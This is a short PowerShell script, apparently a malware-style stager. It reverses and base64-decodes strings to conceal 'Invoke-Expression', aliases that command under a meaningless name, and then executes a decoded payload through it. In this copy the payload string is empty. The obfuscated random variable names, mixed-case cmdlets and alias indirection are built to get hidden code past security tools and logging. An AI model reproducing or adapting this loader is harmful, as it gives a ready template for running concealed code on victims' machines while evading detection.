$nQFMtrdOw = "" ;
$urfGePN98s = $nQFMtrdOw.ToCharArray() ; [array]::Reverse($urfGePN98s) ; $2afSUycVovZ90rxGndD = -join $urfGePN98s ;
$O = switch ($2afSUycVovZ90rxGndD.Length % 4) { 0 { $2afSUycVovZ90rxGndD }; 1 { $2afSUycVovZ90rxGndD.Substring(0, $2afSUycVovZ90rxGndD.Length - 1) }; 2 { $2afSUycVovZ90rxGndD + ("=" * 2) }; 3 { $2afSUycVovZ90rxGndD + "=" }} ;
$WOJj948MZSQ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($O)) ;
$YV0ckS0xa0KQOOwkrs4BnR = '42bpN3UlJHcYVULFt2b25Wa'.ToCharArray() ; [array]::Reverse($YV0ckS0xa0KQOOwkrs4BnR) ; $ebAw3fqMhGcIHKji = -join $YV0ckS0xa0KQOOwkrs4BnR ;
$ebAw3fqMhGcIHKji = switch ($ebAw3fqMhGcIHKji.Length % 4) { 0 { $ebAw3fqMhGcIHKji }; 1 { $ebAw3fqMhGcIHKji.Substring(0, $ebAw3fqMhGcIHKji.Length - 1) }; 2 { $ebAw3fqMhGcIHKji + '=' * 2 }; 3 { $ebAw3fqMhGcIHKji + '=' } } ;
$19soWRE5psXza = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ebAw3fqMhGcIHKji)) ;
$Hy4sH4DAYK5pnMpbHROO10 = 'QQx4mc'.ToCharArray() ; [array]::Reverse($Hy4sH4DAYK5pnMpbHROO10) ; $sOPIRxIoxGSWlxin = -join $Hy4sH4DAYK5pnMpbHROO10 ;
$sOPIRxIoxGSWlxin = switch ($sOPIRxIoxGSWlxin.Length % 4) { 0 { $sOPIRxIoxGSWlxin }; 1 { $sOPIRxIoxGSWlxin.Substring(0, $sOPIRxIoxGSWlxin.Length - 1) }; 2 { $sOPIRxIoxGSWlxin + '=' * 2 }; 3 { $sOPIRxIoxGSWlxin + '=' } } ;
$l3nbvoP1m0WqAMN = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($sOPIRxIoxGSWlxin)) ;
$nuLL = neW-ALiaS -name $l3nbvoP1m0WqAMN -VALUe $19soWRE5psXza -ForCe ; & $l3nbvoP1m0WqAMN $WOJj948MZSQ ;

